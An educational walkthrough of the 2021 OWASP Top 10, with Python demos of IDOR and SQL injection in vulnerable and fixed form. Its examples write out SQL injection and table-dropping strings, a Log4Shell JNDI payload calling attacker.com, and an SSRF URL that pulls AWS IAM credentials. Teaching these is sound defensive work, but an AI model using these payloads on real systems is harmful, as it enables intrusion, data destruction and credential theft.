Access control enforces that users can only act within their intended permissions. Broken access control means those restrictions aren't properly enforced — users can access other users' data, perform privileged actions, or reach resources they shouldn't. It moved to the #1 spot in 2021, found in 94% of tested applications. It covers everything from IDOR to missing function-level access control to CORS misconfiguration.
Consider an endpoint like /api/users/1234/account. The application checks that the user is authenticated but doesn't verify they're requesting their own account. By simply changing 1234 to 1235, an attacker reads another user's account details. This is Insecure Direct Object Reference (IDOR) — one of the most common real-world vulnerabilities. Seen in countless data breach incidents involving health records, financial accounts, and personal data.
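The account endpoint above, as an added example (not code from the original page): the vulnerable handler checks only that a session exists, the fixed handler also checks that the caller owns the record, with a hypothetical "support" role as the one exception; the account table and session object are constructed for the demo.

```python
from dataclasses import dataclass
from typing import FrozenSet, Optional

# Constructed sample data: account id -> record, including the owning user id.
ACCOUNTS = {
    1234: {"owner": 1234, "balance": 100},
    1235: {"owner": 1235, "balance": 250},
}

@dataclass
class Session:
    user_id: Optional[int]                 # None means not authenticated
    roles: FrozenSet[str] = frozenset()    # hypothetical role set, e.g. {"support"}

class Unauthenticated(Exception):
    pass

class Forbidden(Exception):
    pass

def get_account_vulnerable(session: Session, account_id: int) -> dict:
    """Authentication only: any logged-in user can read any account (IDOR)."""
    if session.user_id is None:
        raise Unauthenticated()
    return ACCOUNTS[account_id]

def get_account_fixed(session: Session, account_id: int) -> dict:
    """Authentication plus object-level authorisation: owner or 'support' role only."""
    if session.user_id is None:
        raise Unauthenticated()
    account = ACCOUNTS.get(account_id)
    is_owner = account is not None and account["owner"] == session.user_id
    is_support = account is not None and "support" in session.roles
    # Deny by default, and answer "no such record" and "someone else's record"
    # identically so the endpoint cannot be used to enumerate valid ids.
    if not (is_owner or is_support):
        raise Forbidden()
    return account

def http_status(handler, session: Session, account_id: int) -> int:
    """Map the handler outcome to an HTTP status, as a framework error handler would."""
    try:
        handler(session, account_id)
        return 200
    except Unauthenticated:
        return 401
    except Forbidden:
        return 403
```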
Formerly called "Sensitive Data Exposure," this category was renamed to focus on the root cause: failing to protect data with proper cryptography — or failing to use cryptography at all. This includes transmitting sensitive data in cleartext, using weak or outdated algorithms, improper key management, and not enforcing encryption in transit.
Passwords are stored as unsalted MD5 hashes. When the database is breached, attackers run the hashes through rainbow tables or precomputed lookup databases and recover most passwords within minutes. MD5 and SHA-1 are not password hashing algorithms — they're fast general-purpose hashes. An attacker can test billions of MD5 hashes per second on commodity hardware. The same applies to data at rest encrypted with weak keys, or session tokens transmitted over HTTP.
Hash passwords with bcrypt, Argon2id, or scrypt with appropriate work factors. Never use MD5 or SHA-1 for passwords. Enforce HTTPS with Strict-Transport-Security headers (HSTS). Set Cache-Control: no-store on pages containing sensitive data.
Injection flaws occur when an application sends untrusted data to an interpreter as part of a command or query. The interpreter treats the attacker-supplied data as commands. SQL injection is the classic example, but injection covers NoSQL injection, OS command injection, LDAP injection, template injection, and more. Injection held the #1 spot for over a decade before being displaced by broken access control in 2021.
A login query is built by concatenating raw input: SELECT * FROM users WHERE username='[input]' AND password='[input]'. An attacker enters username ' OR '1'='1. The query becomes: SELECT * FROM users WHERE username='' OR '1'='1' AND password='' — which returns all users, logging the attacker in as the first user (often an admin). More destructively: '; DROP TABLE users; -- destroys the entire table. In 2021 alone, SQL injection was responsible for major breaches across finance, healthcare, and government targets.
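The login query above, concatenated and then parameterised, as an added example (not from the original page) against a constructed in-memory SQLite table: the same ' OR '1'='1 text becomes SQL in the first version and stays a literal string in the second.

```python
import sqlite3
from typing import Optional, Tuple

def make_db() -> sqlite3.Connection:
    """Constructed sample table; plaintext passwords only to keep the injection demo minimal."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "s3cret"), (2, "alice", "wonderland")])
    return conn

def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> Optional[Tuple]:
    """The page's query built by string concatenation: user input is parsed as SQL."""
    sql = ("SELECT id, username FROM users WHERE username='" + username
           + "' AND password='" + password + "'")
    return conn.execute(sql).fetchone()

def login_fixed(conn: sqlite3.Connection, username: str, password: str) -> Optional[Tuple]:
    """Parameterised query: the same text is bound as data and compared literally."""
    sql = "SELECT id, username FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone()

# AND binds tighter than OR, so the payload is placed in both fields here to make the
# injected OR '1'='1' apply to the whole WHERE clause in the vulnerable version.
PAYLOAD = "' OR '1'='1"
```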
Run the application with a least-privilege database account that has neither DROP TABLE nor admin permissions.
A new category in 2021, insecure design focuses on flaws that exist by design — architectural decisions that create risk regardless of implementation quality. It's distinct from insecure implementation (where good design is poorly coded). Security must be considered in the design phase, not bolted on afterwards. No amount of secure coding fixes a fundamentally flawed design.
The most commonly seen issue in practice. Security misconfiguration includes default credentials left unchanged, unnecessary features enabled, overly permissive cloud storage, verbose error messages leaking stack traces, missing security headers, and unpatched systems. As infrastructure has moved to cloud and containers, the misconfiguration attack surface has expanded massively.
Set the standard security headers: Content-Security-Policy, X-Frame-Options, X-Content-Type-Options, Referrer-Policy.
Modern applications are mostly composed of third-party libraries, frameworks, and components. If any of those components have known vulnerabilities and aren't updated, the application inherits those vulnerabilities — regardless of how well the application code itself is written. The Log4Shell vulnerability (CVE-2021-44228) is the defining example: a single library used by thousands of products led to critical remote code execution exposure across the internet.
An attacker submits ${jndi:ldap://attacker.com/exploit} in any user-supplied field (HTTP header, form field, username). Log4j processes the string, makes an outbound LDAP request, and fetches and executes attacker-controlled Java code — resulting in remote code execution. Affected products included VMware, Cisco, Apple iCloud, Amazon, Microsoft Azure. Patching took weeks across the industry.
Use npm audit, pip-audit, Dependabot, or Snyk to get automated alerts.
Formerly "Broken Authentication," this category covers weaknesses in confirming who a user is. Weak passwords, credential stuffing vulnerabilities, missing MFA, broken session management, and improper session invalidation all fall here. Authentication is the gate — everything else depends on it working correctly.
A new 2021 category covering failures to protect against integrity violations in software updates, critical data, and CI/CD pipelines. This includes insecure deserialisation (the original A08 in 2017), using software from untrusted sources without integrity verification, and supply chain attacks where the build or update pipeline itself is compromised — as in the SolarWinds attack.
Without adequate logging and monitoring, breaches go undetected. The average time to detect a breach is still measured in months — often the attacker has full access long before anyone notices. This category covers insufficient logging of security events, failure to monitor logs, not alerting on anomalies, and log data that is too vague to be actionable in an investigation.
Server-Side Request Forgery (SSRF) is a new entry in 2021, added directly from community survey data due to increasing severity. It occurs when an application fetches a remote resource based on user-supplied input without properly validating the URL. An attacker can force the server to make requests to internal services, cloud metadata endpoints, or other sensitive infrastructure — effectively using the server as a proxy to access things the attacker can't reach directly.
Consider an image preview feature that fetches /preview?url=https://example.com/image.jpg. An attacker replaces the URL with http://169.254.169.254/latest/meta-data/iam/security-credentials/ — the AWS instance metadata endpoint. The server fetches it and returns the IAM role credentials in the response. The attacker now has AWS access keys with whatever permissions the server's IAM role has. This exact attack has been used in real breaches including the 2019 Capital One breach (100 million records).
The Open Worldwide Application Security Project — a non-profit foundation that produces freely available security research, tools, and standards. The Top 10 is updated roughly every 3–4 years and is considered the baseline standard for web application security. It's referenced in PCI DSS and in hiring requirements, and used as the foundation for DAST and SAST tool rule sets.
The Top 10 is not a comprehensive vulnerability list — it's a risk awareness document focused on the most broadly prevalent issues. It doesn't replace a full threat model or cover every vulnerability class. XSS, CSRF, and open redirect aren't standalone entries in 2021 (they fall under other categories). Use the Top 10 as a starting point, not a complete checklist.
The Top 10 maps directly to the OWASP Application Security Verification Standard (ASVS) which provides testable security requirements at three levels. For each entry here, there are corresponding ASVS controls that give you specific, implementable requirements rather than general guidance. ASVS Level 1 is a reasonable baseline for most web applications.
The OWASP Top 10 is directly tested in CompTIA Security+, CySA+, CASP+, CEH, and OSCP. For Security+ specifically, you'll need to know what each entry is, a real-world example, and the primary mitigation. The 2021 edition is now the current exam standard — make sure you know the new entries (A04 Insecure Design, A08 Software Integrity, A10 SSRF).